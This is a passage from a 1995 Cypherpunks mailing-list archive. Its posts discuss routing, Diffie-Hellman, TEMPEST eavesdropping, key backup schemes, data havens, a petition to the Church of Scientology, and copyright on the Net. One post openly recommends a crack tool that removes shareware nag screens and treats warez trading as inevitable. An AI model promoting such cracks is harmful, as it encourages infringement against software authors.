solutions to the routing problem are > mathematically intractable. Tolerable solutions are mathematically > tractable. Name one, Mr. Donald. Name a single one. > For realistic routing problems, tractable approximations > are only worse than an optimal solution by a modest factor. Sorry, but you just don't know what you are talking about here, period. We don't know how to solve the routing problem in the general case. Thats one of the reasons for all the arguments in the IETF concerning the problems we are getting ourselves into with route agregation. (Just so you are clear here, Mr. Donald, the routing problem is NOT the problem of finding an optimal path between all pairs of nodes on a network in polynomial time -- thats solved and absolutely useless.) > Of course I am sure Perry is correct when he says that > the tractable approximations that we are currently using > fail to scale, but this is not a fundamental unsolved > problem in mathematics -- it is merely yet another bug. Nope, not a bug. There are problems that we don't know how to solve. The problem is routing agregation, you understand, and the fact that agregated clouds don't really experience locality of reference. This means that we end up with nasty and totally artificial network choke points as the networks scale. If we transmit full information, however, we no longer get agregation and can no longer store the tables because they are too big. Perry From jalicqui at prairienet.org Wed Jan 18 11:42:18 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Wed, 18 Jan 95 11:42:18 PST Subject: EE Times on PRZ Message-ID: <9501181942.AA27518@firefly.prairienet.org> Strick wrote: >THUS SPAKE jalicqui at prairienet.org (Jeff Licquia): ># Another quote from the article posted elsewhere said that, "PGP, which is ># based on the Diffie-Hellman public-key technology developed in the 1970s..." ># This is technically true, since all public-key work (including RSA) is based ># to some extent on DH. It could be, however, that the author is confusing > >DH uses "discrete log" as the hard problem, and very straightforward >mathematics. > >RSA uses "factoring" as the hard problem, and a very clever back door. > >How do you decide if one is based on the other? Sorry, I wasn't perfectly clear. Of course, RSA is not based on Diffie-Hellman specifically; what I mean is that all public-key work is based on that general paper, which "invented" public-key cryptography. I think this very confusion may be plaguing the writer of the aforementioned article. ># public-key technology with Diffie-Hellman public-key in particular, which ># (as I understand it) is not particularly secure. > >It's still up in the air, isn't it, whether the discrete log or >factoring is the harder to crack. My intuition is they're the >same hard. It was my impression that DH had a further weakness not related to the difficulty of the hard problem. As my copy of Schneider is at home, I must defer to ignorance at this point. From joelm at eskimo.com Wed Jan 18 12:09:51 1995 From: joelm at eskimo.com (Joel McNamara) Date: Wed, 18 Jan 95 12:09:51 PST Subject: TEMPEST Message-ID: <199501182009.AA11815@mail.eskimo.com> Tim May wrote: >TEMPEST has very little to do with Cypherpunks goals, actually. First, >buying such a gadget, tweaking it, exploring capabilities, etc., would >lead to what? The ability to park a van in front of someone's house >and--maybe--monitor their screens? We already know this is possible. >(You all knew that, didn't you?) If a Cypherpunk goal is to champion electronic privacy, it seems to me that it is important to fully understand any threats to the methods used to ensure privacy. The old Sun Tzu "know your enemy" philosophy. If I was running a Data Haven, I'd want to understand how and if my system could be passively eavesdropped on, and what countermeasures to take to minimize the risk. (Second or third down the list from knowing my encryption algorithm was secure.) Granted, I'd spend more efforts with firewalls because a hacker/cracker attack would be a more realistic threat, but if there was even the most remote chance that a government agency/well-funded concern with TEMPEST capability was interested in me, I'd sure like to make their job more difficult. The thing that I find frustrating about TEMPEST, is most informed people say "yes, it's possible," but I have encountered only breadcrumbs of real-world, technical information and sources on it (the VanEck article, the BBC tape, Grady Ward's paper, etc.). This is what prompted the original message to the list. Yes, TEMPEST is real. But what I'm trying to do is shift out TEMPEST reality (and capabilities) from the magical black-box in parked vans tales. Joel McNamara joelm at eskimo.com - finger for PGP key From rfb at lehman.com Wed Jan 18 12:14:06 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Wed, 18 Jan 95 12:14:06 PST Subject: What is this? Anonymous message failed In-Reply-To: Message-ID: <9501182012.AA11306@cfdevx1.lehman.com> Date: Wed, 18 Jan 1995 09:59:54 -0800 From: Lucky Green Just got back a message from Julf's remailer that my Anonymous message failed (wrong password). Needless to say, I didn't try to send one through the remailer. The message it was refering to is the one I sent to the list earlier. Is this a repeat of the an/na problems we had in the past? Yes. The bounce message that I got back included this header line: X-Envelope-To: an157790 I sent a message to and got back a reply stating that the person had unsubscribed hirself and may resubscribe ``in the clear''. Rick From tcmay at netcom.com Wed Jan 18 13:09:58 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 13:09:58 PST Subject: TEMPEST In-Reply-To: <199501182009.AA11815@mail.eskimo.com> Message-ID: <199501182032.MAA19257@netcom12.netcom.com> Joel McNamara wrote: (quoting me) > >TEMPEST has very little to do with Cypherpunks goals, actually. First, > >buying such a gadget, tweaking it, exploring capabilities, etc., would > >lead to what? The ability to park a van in front of someone's house > >and--maybe--monitor their screens? We already know this is possible. > >(You all knew that, didn't you?) > > If a Cypherpunk goal is to champion electronic privacy, it seems to me that > it is important to fully understand any threats to the methods used to > ensure privacy. The old Sun Tzu "know your enemy" philosophy. If I was > running a Data Haven, I'd want to understand how and if my system could be > passively eavesdropped on, and what countermeasures to take to minimize the > risk. (Second or third down the list from knowing my encryption algorithm > was secure.) Sure, let us know what you find. I'm not being catty here; I'm making a serious point about return on investment. My guess is that getting a reasonable Van Eck capability could cost $10K, maybe less, maybe more. And what would this show that we basically don't already know in principle? (We've all seen televisions showing "interference" from computers, so we know that signals are getting out....) And if nothing is seen with our $10K of equipment, what does this prove against an attacker who can easily afford to spend 20 or 30 times that amount to equip a van? Cypherpunks have been exploiting technology that is comparatively _much cheaper_ and which changes the equation. But, again, let me not discourage you (Joel) from becoming our expert on TEMPEST and Van Eck emissions. You may find it fun, and maybe even profitable (consulting for corporations to harden their sites, for example). I just object to the "we ought to be doing this" mentality. In general, for reasons many of us have written about here before, and in particular, because I think spending $10,000 to prove what we already know--that RF emissions can be detected and demodulated--is a poor use of money. That $10K would go a long way to getting PGP Phone finished. > The thing that I find frustrating about TEMPEST, is most informed people say > "yes, it's possible," but I have encountered only breadcrumbs of real-world, > technical information and sources on it (the VanEck article, the BBC tape, > Grady Ward's paper, etc.). This is what prompted the original message to > the list. Yes, TEMPEST is real. But what I'm trying to do is shift out > TEMPEST reality (and capabilities) from the magical black-box in parked vans > tales. Then go for it. Make this your specialty, your contribution to the Cause. But beware of empty exhortations that "somebody ought to work on this." "We have met the somebody, and he is us." --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From mab at research.att.com Wed Jan 18 13:27:32 1995 From: mab at research.att.com (Matt Blaze) Date: Wed, 18 Jan 95 13:27:32 PST Subject: Threats in real life - what are we worried about? Message-ID: <9501182129.AA18239@merckx.info.att.com> Tim May writes: > TEMPEST has very little to do with Cypherpunks goals, actually. First, > buying such a gadget, tweaking it, exploring capabilities, etc., would > lead to what? The ability to park a van in front of someone's house > and--maybe--monitor their screens? We already know this is possible. > (You all knew that, didn't you?) I disagree. "TEMPEST" risks and countermeasures are but one entry on a long list of subjects in which our ignorance (and that of the civilian security community in general) may well come back to bite us. Granted, this is the "cypherpunks" list, not the "securitypunks" list, but it behooves anybody interested in developing strong mechanisms to accomplish some security objective to be at least acquainted with how those mechanisms fit in the larger picture. One of the most dangerous aspects of cryptology (more dangerous, perhaps, than fact that there are almost no solid theorems that tell us how secure practical ciphers really are) is that you can measure it. It's all too tempting to misuse an estimate for the cryptographic work factor for some cipher as if it were some kind of overall security metric for the systems in which it is deployed. In real life, there are lots of ways to violate system security, including cryptanalysis, protocol attacks, Trojan horses, viruses, electromagnetic monitoring, physical compromise, rubber hose cryptanalysis, OS bug exploitation, application bug exploitation, hardware bug exploitation, user error exploitation, physical monitoring, social engineering, court orders, dumpster diving, and so on and so on. Most of us on the list like to think about cryptography and cryptographic protocols, and that's fine, but it isn't the same as thinking about building secure systems that are strong enough to withstand attackers who aren't willing to restrict themselves to a strictly cryptographic threat model. Unfortunately, the world outside the cypherpunks list isn't much better off than we are in understanding these "informal", but all too real, threats. Thinking about some of them would, I think, go a long way toward contributing to "Cypherpunk goals" as I understand them. (Practical TEMPEST shielding is one such problem. Another good one is the almost completely ignored problem of storing secret keys on networked computers. Still another is the problem of using security software remotely with limited local computation. There are lots more.) That said, no one can force these discussions to happen, and no one, much less me, has a right to complain that everyone else is talking about the "wrong stuff". So let me raise a question: Given existing crypto tools (PGP, etc), what are the top ten practical attacks against the privacy of stored data and electronic mail? Who are the bad guys? What tools do we need to limit these threats? I'll post my own thoughts later. -matt From andrew_loewenstern at il.us.swissbank.com Wed Jan 18 13:51:11 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Wed, 18 Jan 95 13:51:11 PST Subject: EE Times on PRZ Message-ID: <9501182146.AA03035@ch1d157nwk> jalicqui at prairienet.org (Jeff Licquia) wrote: > It was my impression that DH had a further weakness not related to > the difficulty of the hard problem. As my copy of Schneider is at > home, I must defer to ignorance at this point. My understanding is that once you do the computation to solve a DH exchange you can use that information to easily solve any exchange under the same generator and modulus. So it's important to at least use large enough numbers to make this unfeasable. I think it was Suns SecureRPC that shipped with a fixed (and not big enough) generator and modulus and was not secure (assuming someone had already done the pre-computation). Maybe this is what you were thinking of? As always, proper generation of components is an important consideration in implementing public-key systems. andrew From adam at bwh.harvard.edu Wed Jan 18 14:01:12 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 18 Jan 95 14:01:12 PST Subject: Key backup (was: How do I know . ..) In-Reply-To: <199501181754.MAA24686@bb.hks.net> Message-ID: <199501182200.RAA08888@freud.bwh.harvard.edu> D.C. Williams wrote: | With barcoding as the standard, another person prints his key on a small | unmarked card and hides it somewhere deemed to be secure by him. The | UPC-label attack fails because his keyring isn't disguised as UPC product | labels. How does the attacker know what to look for? | | True Paranoids could devise some sort of "invisible ink" method, | requiring UV or heat exposure before the barcode becomes visible. | Now your backup key looks like a blank sheet of paper. ;-) Picking a few nits: Putting the UPC's on things other than cards (such as books) makes it easier to hide in the open. `UPC' stickers on, say, a few books are easier to miss than UPC stickers on index cards. Invisible ink draws attention to the correct UPC's once they know you're using it. See Kahn for a discussion of secret inks being developed during the second world war. If you want to hide bits, they should be stripped of low entropy parts and hidden with a stego program. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From pstemari at erinet.com Wed Jan 18 15:42:52 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 18 Jan 95 15:42:52 PST Subject: Another problem w/Data Havens... Message-ID: <9501182333.AA09451@eri.erinet.com> At 05:05 PM 1/17/95 -0700, Ben.Goren at asu.edu wrote: > ... That's the main reason why I like my idea of having a trusted encryptor. >Nobody's suggested that the current timestamp operators would be in Deep >Doo-Doo if they timestampped some piece of thoughtcrime; why should >somebody who encrypts be any different? ... Quite possibly the timestampers would be in trouble, the risk for them is the same as the risk for the remailers and the DH operators. As long as some piece of info is considered to be a thought-crime, everyone who accepts info from a wide range of sources is at risk. > ... The service could even be advertised as a different form of timestamping >(or notarizing). Not only do you get the file back signed, but you get it >back encrypted and signed. ... That would still be a useful service, however, but it does transfer the risk from the DH operator to the encryptor. Since he isn't leaving evidence on a hard drive, his window of vunerability is somewhat less. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From dcwill at ee.unr.edu Wed Jan 18 15:53:40 1995 From: dcwill at ee.unr.edu (Dr. D.C. Williams) Date: Wed, 18 Jan 95 15:53:40 PST Subject: Key backup (was: How do I know . ..) Message-ID: <199501182358.SAA29305@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- 'Adam Shostack' was reported to have written: > Putting the UPC's on things other than cards (such as books) > makes it easier to hide in the open. `UPC' stickers on, say, a few > books are easier to miss than UPC stickers on index cards. Exactly. If the intention is to keep them out in the open, then making labels which resemble UPCs is preferred. However, if I'm going to dig a hole in the ground at a secret location and bury my barcoded key in a special container, a different format might be indicated. > Invisible ink draws attention to the correct UPC's once they > know you're using it. See Kahn for a discussion of secret inks being > developed during the second world war. I'll do that, but I think you might be intermixing ideas. Pseudo-UPCs in invisible ink wouldn't be a good combination. Pseudo-UPCs should probably be printed exactly like normal UPCs. If you want the "invisible ink" process, it should probably blend into the ambient environment as much as possible. Even if "they" know you're using secret ink, don't "they" have to find the printed key first? How much work is required to check every page of every book and every sheet of paper you might have access to? You could mail your key anywhere in the world invisibly printed on the outside of an envelope. Better yet, send someone a special document (wedding announcement, legal document, 21st birthday card, whatever; the important part is to send something that the recipient will keep) with your keyring invisibly printed on it. Variations on this theme (there are many) are encouraged. Have a friend check out a library book and let you stamp your key somewhere inside. It's the number of possible variations that make this seemingly impossible to attack. Apologies if this "secret ink" stuff is way off base ;-) . Most people (myself included) would opt for the "split and disguise" or "hidden/buried" key schemes where secret ink wouldn't add much security. > If you want to hide bits, they > should be stripped of low entropy parts and hidden with a stego > program. The idea was to use something other than magnetic media. A new and different optical encoding method could be devised to hide a key in a halftone, but the barcode example was offered as one possibility using an existing standard. The basis for this thread was the perceived need for a relatively simple key backup system that didn't require the active participation of a whole hoard of people. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLx2rEyoZzwIn1bdtAQEBVAGAzJc1fOAchLGEIlnbQBiJXV2cICE2WK8e 8FnXnP8ztcWEdUCYY0vjDewiLI2iW4bt =tUR2 -----END PGP SIGNATURE----- From pstemari at erinet.com Wed Jan 18 16:24:19 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 18 Jan 95 16:24:19 PST Subject: Does encrypted equal safe? Message-ID: <9501182334.AB09451@eri.erinet.com> At 04:55 PM 1/17/95, Sandy Sandfort wrote: > ... In my law school they taught that the burden of proof in a >criminal case was on the government. Unless of course the case involves porn, drugs, etc, in which case the current practice in the American legal system places the onus on the accused, regardless of what the Constitution requires. Civil forfeiture is a fine example of this, along with requiring porn producers to demonstrate the age of their models, etc ad nauseum. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From Ben.Goren at asu.edu Wed Jan 18 16:37:19 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Wed, 18 Jan 95 16:37:19 PST Subject: Another problem w/Data Havens... Message-ID: At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote: >[. . .] As long as >some piece of info is considered to be a thought-crime, everyone who accepts >info from a wide range of sources is at risk. We might have a test case right now for part of that idea--the Scientologists. They're essentially claiming that the various newsgroups should be shut down because somebody put thoughtcrime on them. I would posit that the operator of any automated data transmission/massaging service is not responsible for the data that passes through her equipment. Consider, for example, if I used a bang path to route an illicit email note through, say, apple.com. Does that make Apple Computer responsible for what I send? Tying in with some of Eric's comments, this could be viewed as a fundamental flaw in the 'net: it's the sender, generally, who initiates and controls the connection, not the recipient. We could view this as an advantage: how can you blame me for what somebody else does to my computer without my knowledge, especially if I have no way to stop it short of getting off the 'net completely? >> ... The service could even be advertised as a different form of timestamping >>(or notarizing). Not only do you get the file back signed, but you get it >>back encrypted and signed. ... > >That would still be a useful service, however, but it does transfer the risk >from the DH operator to the encryptor. Since he isn't leaving evidence on a >hard drive, his window of vunerability is somewhat less. Less to nonexistent. If no human sees it on the encrypting site, no human can be responsible for it. "They" would have to ban the service outright, or try to prove that you knew that your site would be used for illicit purposes. If putting a warning to not export crypto software on an ftp site is sufficient protection--and, judging from the number of sites which do no more than that, it is--then a simple statement that the service is not to be used for any illegal purpose should do fine here. > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From tcmay at netcom.com Wed Jan 18 16:39:11 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 16:39:11 PST Subject: Good "Economist" article on Cyberspace Message-ID: <199501190038.QAA23631@netcom4.netcom.com> [I'm getting no Cypherpunks list traffic today, only mail sent to me directly, so I apologize if this has come up already.] The Jan 14-20 issue of "The Economist" has a good article on "Who speaks for cyberspace?," which does a good job of summarizing the civil libertarian arguments and why the EFF "imploded." ... "Little wonder that many Internet pioneers thought they had stumbled upon an electronic Utopia....If a single set of beliefs can be said to dominate the politics of cyberspace, it is radical libertarianism..." About the withdrawal of the EFF from the political fray: "That leaves cyberspace's radical libertarians without a voice in Washington. They're probably delighted." I know I am. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From frissell at panix.com Wed Jan 18 17:22:42 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 18 Jan 95 17:22:42 PST Subject: Good "Economist" article on Cyberspace In-Reply-To: <199501190038.QAA23631@netcom4.netcom.com> Message-ID: Right Tim it was a great article in the Economist Tradition. I'll post it as soon as it makes it into the databases. Unblievable Barlow Quote: On-line purists might want nothing to do with government, but government was likely to intrude anyway. So the EFF sought to minimise the intrusion; "to keep Pharoh from following us into the Red Sea," as Mr. Barlow puts it. I *want* Pharoh to follow us into the Red Sea, myself. DCF -- You don't have to be nice to nation states you meet on the way up if you're not coming back down. From asgaard at sos.sll.se Wed Jan 18 17:45:03 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Wed, 18 Jan 95 17:45:03 PST Subject: copyright and data havens In-Reply-To: Message-ID: rishab at dxm.ernet.in wrote: > factories). It's not going to be easy to find a country more willing and > able to ignore international copyright law (Berne Convention etc) than China; > however, despite howls of protest even China is likely to knuckle down > eventually. What may be likely is distributed piracy markets, such as In the foreseeable future (10 years?) there will exist jurisdictions that, even after signing this or that convention, will be more or less lax about pursuing violators. Thus I still believe, despite China's awaited submission, that the Internet and 28.8 modems (and abundance of disk space) are real threats to holders of copyright who want to protect every penny. Encryption (by the way, how long might it take to IDEA-encrypt a 2 MB .zip file? I never tried) will make it practically impossible to find and prosecute at least private copyright abuse. They won't use thumb- screws to obtain the key to your SecureDrive just on suspicion of infringement (except possibly in Singapore). The present situation, as we all know, is that few people are willing to pay for such software as games if they can get a (cracked) version for free. I think this attitude will expand to most software. The real war will be faught between protectors and crackers (since it is usually not convenient to export an opened, installed version to another system - and more so the bigger and directory-spreading the program is). Actually, a sort of data haven for cracks already exists. If you live in a jurisdiction where cracks are illegal to advertize (let alone use) they can be hard to find on your local BBS, but with an Internet feed (or long distance modem calls) it's no problem at all. (For those who don't believe in the shareware concept I recommend the Norwegian nag-eliminator 'Buster' - although you need the registered version for the latest versions :-) Mr La Macchia got caught. How many didn't? Look at the IRC Undernet: wArEz-bots all over the place - and I bet the net.cops are lagging in bot comprehension (unfortunately, so am I...). And there is talk about this Secure-IRC. Mats From skaplin at mirage.skypoint.com Wed Jan 18 18:02:40 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 18 Jan 95 18:02:40 PST Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd) (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I thought this was topical and VERY much of interest here. Sam - -------- Forwarded message -------- [Hurry! Signature tallying for this petition EXPIRES February 6, 1995! Be sure to send your signature to cos-petition at netcom.com -- see the instructions after the petition statement. The petition statement begins 68 lines down from here.] Following this short introductory section is the petition statement to the Church of Scientology and affiliated organizations regarding their recent legal actions which have very serious ramifications for freedom of expression on Usenet and the Internet. It is somewhat long, but the length is necessary to give you sufficient information to make an informed decision. I want to stress that this petition is NOT focused on the beliefs or practices of the Church of Scientology. Rather, it is focused on their recent legal action, and this petition demands that they reconsider these actions for the good of everyone, including themselves. It should also be made *very clear* that none of us should ever condone or support any action which would censor or inhibit Scientology supporters from being able to express their views and opinions on Usenet, the Internet, and all other electronic forums, provided they do so in accordance with accepted netiquette, as all of us should. I encourage you to read the petition statement carefully, and if you agree with all three demands (given near the end of the statement), to then "sign" it via Internet e-mail using the instructions which follow the statement. Do follow EXACTLY the directions on how to "sign"; they are not difficult. Note that only those with valid Internet-accessible e-mail addresses can sign this petition. Fortunately, nearly all on-line services, such as CompuServe, and many BBS, do offer Internet e-mail acess, so just about anybody who is electronically hooked up to some network in the world can sign this petition. If you are not sure what your Internet e-mail address is, ask your site's sysadmin/sysop for assistance. Please do upload this petition statement as soon as possible to any BBS and on-line service in your area. If you have access to one of the major national on-line services such as CompuServe, Prodigy, AOL, etc., do try to upload it there. We are trying to get at least 5000 signatures. Even more signatures are entirely possible if we each put in a little effort to inform others, such as friends and coworkers, about the importance of this petition to electronic freedom of expression. I plan to make the signatures publicly available on or shortly after February 7, 1995, and will also submit them to the Church of Scientology as well as the newsmedia. Important Note: Because of the unusual sensitivity of this petition, I will not submit nor reveal the e-mail signatures IF the total number of validated signatures is less than 1000. This offer is made for those who would feel "exposed" if their name appears on a list with a small number of signatures. I fully expect to surpass 1000 signatures in one or two days! In addition, unlike past net-petitions, providing one's full name in addition to one's e-mail address will be optional. However, I highly encourage you to be brave and include your full name, as all petitions are traditionally considered more "binding" if real names are used. I will tally the number of signatures with and without full names when the petition drive ends February 6, 1995. Thank you for your signature! Let's all do our part to keep all electronic networks free and open for everybody. Jon Noring (Disclaimer: Nothing written in this petition transmittal should be construed as legal advice. If you need legal assistance or advice concerning any of the issues brought up in this document, contact a qualified attorney.) **************** Beginning of Petition Statement ******************** TO: The Church of Scientology, The Religious Technology Center, Bridge Publications, Inc., Office of Special Affairs, and all other affiliated organizations, divisions and corporations of the Church of Scientology We, the undersigned, are disturbed by your recent legal attempts to stifle the free flow of information on the Internet and Usenet. Specifically, you have 1) threatened legal action against several automated anonymous remailers unless they filter out *all* e-mail targeted to the legitimate Usenet newsgroups alt.religion.scientology (a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all points of view about Scientology, both pro and con, are welcome, and 2) demanded and actually attempted the removal of a.r.s. in gross defiance of accepted Usenet practice and netiquette. Concerning 1), since nearly all (if not all) of the e-mail sent to a.r.s. and a.c.t. via the remailers is legitimate and originates from individuals who sincerely believe they need to post anonymously because of the nature of discussion, your demand, if implemented, would prevent these individuals from freely expressing their views in the proper forum. Freedom of expression is internationally recognized as one of the most important and sacred of basic human rights, and your demands fly in the face of this recognition. Your second demand, removing a.r.s., would go even further in inhibiting freedom of expression on all electronic networks. It is a *very* serious matter to attempt to remove forums of free expression. Your primary argument for issuing these legal threats, according to your statements, are that some people (the "perpetrators") have knowingly posted *alleged* (meaning not yet demonstrated in a court of law) Church of Scientology copyrighted and trade secret material to a.r.s. and a.c.t., sometimes using the anonymous remailers as the carrier (because of the common carrier-like nature of anonymous remailers, the administrators of the remailers have no knowledge of such activity taking place). Though we do not condone making copyrighted material available on any electronic network without the permission of the copyright holder, your specific legal threats are short-sighted, perceived to be mean-spirited, ineffective, and are on tenuous legal grounds because 1) It won't stop those who are determined to make available alleged copyrighted materials on electronic networks. They will find other avenues on the electronic networks to do so. Only prosecuting the actual perpetrators will deter this alleged illegal activity. 2) Your demands, if met, will have the effect of leading to significant stifling of free speech and the exchange of information on all electronic networks which, if not illegal in some jurisdictions, goes against all accepted conventions of a free and open society, 3) You have not stated, nor is there any indication, that you intend to work in a cooperative manner with legitimate law-enforcement agencies, the courts, and/or the Internet to locate and prosecute the perpetrators of the *alleged* copyright violations in the countries they originated. Thus, your threats are being construed, rightly or wrongly, by most on the electronic networks as an attempt to stifle free discussion on Scientology rather than trying to locate and prosecute the perpetrators of the *alleged* copyright and trade secret violations. With respect to the attempted removal of the newsgroup a.r.s., you also stated that the word 'scientology' is trademarked and thus the name a.r.s. infringes on such trademark. This is appallingly ludicrous based on past case law of similar situations, as well as your implicit acknowledgement of the legitimacy of a.r.s. by allowing Church of Scientology approved information to be posted to it by your supporters, and possibly with your knowledge and/or approval, ever since it was created July 1991, almost 3.5 years ago. Therefore, we, the undersigned, make the following demands. 1) Regarding your charges of copyright violation over electronic networks: You will cease all legal action, now and in the future, against any person, company, organization, etc., associated or affiliated in any way with all electronic networks, including the Internet, except that action which is necessary to locate and prosecute the perpetrators (as previously defined) of alleged copyright and trade secret violations, and other activity in violation of law, and *only* in full cooperation with legitimate law-enforcement agencies and/or the courts. 2) Regarding your trademark challenge of the Usenet newsgroup alt.religion.scientology: You will cease all legal action, now and in the future, to remove any Usenet newsgroup, BBS forum, mailing list or other similar forum of public exchange of information over any electronic network, or to inhibit in any way the flow of information to and from these forums. This includes, for example, ceasing all legal action demanding a) the removal of the Usenet newsgroup alt.religion.scientology and b) that anonymous remailers add filters as previously described. 3) You will publicly and officially state a) That you support the existence of free and open forums on all electronic networks to discuss Scientology from all perspectives and points of view (which includes yours), and b) That you do not support nor condone attempts by any entity to electronically censor, remove, obstruct, or tamper with any electronic communication except when allowed by a valid court order. If you outright reject or refuse to even discuss these demands in a good faith manner on Usenet, we have no other option but to consider such rejection or refusal to even discuss to be an act of hostility by the Church of Scientology towards the users of all electronic networks and forums, including the Internet. We are certain you do not want this, and we do not want it either, so we offer to work with you any way we can with regard to any legitimate demands you may have concerning alleged copyright violation(s) and other illegal activity. However, any attempts by you of any kind to tamper or in any manner restrict the free flow of information (other than that *specifically* restricted by law -- and *only* that) on any electronic network is totally unacceptable and will not be tolerated for the reasons stated above. Signed, ******************* End of Petition Statement *********************** ====================================== Instructions for Signing This Petition ====================================== It must first be noted that this is a petition, not a vote. By "signing" it you agree with *all* the demands of the petition statement. If you do not agree with all the demands, then your only recourse is to not sign it. In addition, all e-mail signatures will be submitted to the Church of Scientology as well as the newsmedia provided more than 1000 validated signatures are obtained. Including your full name is optional, but very highly encouraged as that would add to the effectiveness of the petition. Signing via an anonymous remailer is discouraged, but not forbidden, as an attempt will be made to separately tally signatures from anonymous remailers. Signing this petition is not hard, but to make sure your signature is not lost or miscounted, please follow these directions exactly: 1) Prepare an e-mail message. In the main body (NOT the Subject line) of your e-mail include the ONE-LINE statement: SIGNED You need not include the "<" and ">" characters. 'SIGNED' should be capitalized. As stated above, your full name is optional, but highly recommended. If you do supply your name, please don't use a pseudonym or nickname, or your first name -- it's better to just leave it blank if it's not your full and real name. *************************************** Example: My e-mail signature would be: SIGNED noring at netcom.com Jon E. Noring *************************************** 2) Please DON'T include a copy of this petition, nor any other text, in your e-mail message. If you have comments to make, send e-mail to me personally, and NOT to the special petition e-mail signature address. 3) Send your e-mail message containing your signature to the following Internet e-mail address and NOT to me: =========================== cos-petition at netcom.com =========================== 4) Within a few days of receipt of your signature, an automated acknowledgment will be e-mailed to you for e-mail address verification purposes. You do not need to respond or reply to this acknowledgement when you receive it. Thank you for signing this petition! Jon Noring (p.s., send your signature to cos-petition at netcom.com) - -- OmniMedia | The Electronic Bookstore. Come in and browse! Two 1312 Carlton Place | locations: ftp.netcom.com /pub/Om/OmniMedia/books Livermore, CA 94550 | and ftp.awa.com /pub/softlock/pc/products/OmniMedia 510-294-8153 | E-book publishing service follows NWU recommendations. - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== A skydiving school is one in which you MUST be a dropout to graduate - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== All things being equal, a fat person uses more soap than a thin person. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLx3G58lnXxBRSgfNAQFeFAf/TBVzKQAG/y2MAvEvwuMjEXpvtYx6MoDK v+1WzKBygZcktJTag8QfNEKA1G99cl+VbfK6eoEcC2VMXGrOZHXH8qHQz2uGxLa9 +JA4n4hs19aSw1WJEYxaxrLB+a5cQjjaEybu6u2OP0n2WIdLrMtPPkDDmw0Y/KAs 6uqdbwtxhBQgIFoXSrmv/meuv3cjfsVHMhgPpNGbOBCopgKU3Vq6DzbqcG43kGE5 PD6ThO5G2vYx+wIJc/LFRvnXxXaRbZ9w1uX2OmrDOhRTdGprpKONKYfXc5lhxKf3 UkKruotDVsNY9VGCTW765NfZGz+dvfERIi5KEYwDM4yVNuDE01XRTw== =B4jE -----END PGP SIGNATURE----- From rishab at dxm.ernet.in Wed Jan 18 18:10:33 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Wed, 18 Jan 95 18:10:33 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED Message-ID: I've missed recent traffic so forgive me if this has already come up. Lance Rose writes a particularly twisted piece in the Idees Fortes section of WIRED 3.02 (February). His basic premise is that tradritional forms of copyright law are sufficient to ensure that the Net poses only limited problems to mass content producers such as Time Warner. I agree with this, as most people feel uncomfortable about 'stealing' however impossible it is to detect. Lance Rose, though, goes on to insist that the reason for the copyright law's strength will be the power of the omnipresent Net Cops (sic). So that you don't consider him entirely ignorant, he acknowledges the increasing use of anon remailers. However, he adds (repeatedly), "Can't we all use anonymous remailers to keep the Net knee-deep in infringing copies? Nope. Net cops can swiftly clean each new infringement out of the major online markets as soon as it appears." How will they do this so efficiently? By "deploying software agents" net-wide to "search out anonymous infringements." He later admits the possibility of "friend-to-friend" markets, but rejects the possibility of such markets growing out of hand, as "few or none of the participants will know everyone else in the circle" allowing cops to join them undetected (as if the Information Liberation Front would mind giving the _cops_ pirated software). "A 